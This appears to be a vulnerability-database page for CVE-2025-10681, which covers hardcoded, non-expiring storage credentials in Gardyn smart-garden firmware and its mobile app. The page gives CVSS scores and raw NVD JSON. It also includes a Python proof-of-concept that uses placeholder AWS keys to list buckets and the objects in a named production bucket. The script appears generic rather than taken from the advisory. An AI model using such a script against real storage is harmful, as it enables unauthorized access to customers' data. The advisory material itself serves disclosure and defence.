Security Vulnerability Report
中文
CVE-2025-10681 CVSS 8.6 HIGH

CVE-2025-10681

Published: 2026-04-03 21:17:09
Last Modified: 2026-04-07 13:20:55

Description

Storage credentials are hardcoded in the mobile app and device firmware. These credentials do not adequately limit end user permissions and do not expire within a reasonable amount of time. This vulnerability may grant unauthorized access to production storage containers.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Gardyn 智能园艺设备固件 (具体版本参考 ICSA-26-055-03)
Gardyn 移动应用 (具体版本参考 ICSA-26-055-03)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import boto3 from botocore.exceptions import ClientError # Configuration extracted from the hardcoded firmware/app analysis # In a real scenario, these keys are found by reverse engineering the binary HARDCODED_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE" HARDCODED_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" TARGET_BUCKET = "gardyn-production-data-container" REGION = "us-east-1" def check_vulnerability(): print("[*] Attempting to access storage using hardcoded credentials...") try: # Initialize the S3 client with extracted credentials s3_client = boto3.client( 's3', region_name=REGION, aws_access_key_id=HARDCODED_ACCESS_KEY, aws_secret_access_key=HARDCODED_SECRET_KEY ) # Test 1: List buckets to check if credentials are valid response = s3_client.list_buckets() print(f"[+] Success! Credentials are valid.") print(f"[+] Found {len(response['Buckets'])} buckets accessible.") # Test 2: Attempt to access the specific production container mentioned in CVE try: objects = s3_client.list_objects_v2(Bucket=TARGET_BUCKET) if 'Contents' in objects: print(f"[+] CRITICAL: Successfully accessed sensitive bucket: {TARGET_BUCKET}") print(f"[+] Sample objects found:") for obj in objects['Contents'][:5]: print(f" - {obj['Key']}") else: print(f"[+] Accessed bucket {TARGET_BUCKET}, but it appears empty or list permission denied.") except ClientError as e: print(f"[-] Error accessing specific bucket: {e}") except ClientError as e: print(f"[-] Authentication failed or credentials are invalid: {e}") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10681", "sourceIdentifier": "[email protected]", "published": "2026-04-03T21:17:08.630", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Storage credentials are hardcoded in the mobile app and device firmware. These credentials do not adequately limit end user permissions and do not expire within a reasonable amount of time. This vulnerability may grant unauthorized access to production storage containers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-055-03.json", "source": "[email protected]"}, {"url": "https://mygardyn.com/security/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-055-03", "source": "[email protected]"}]}}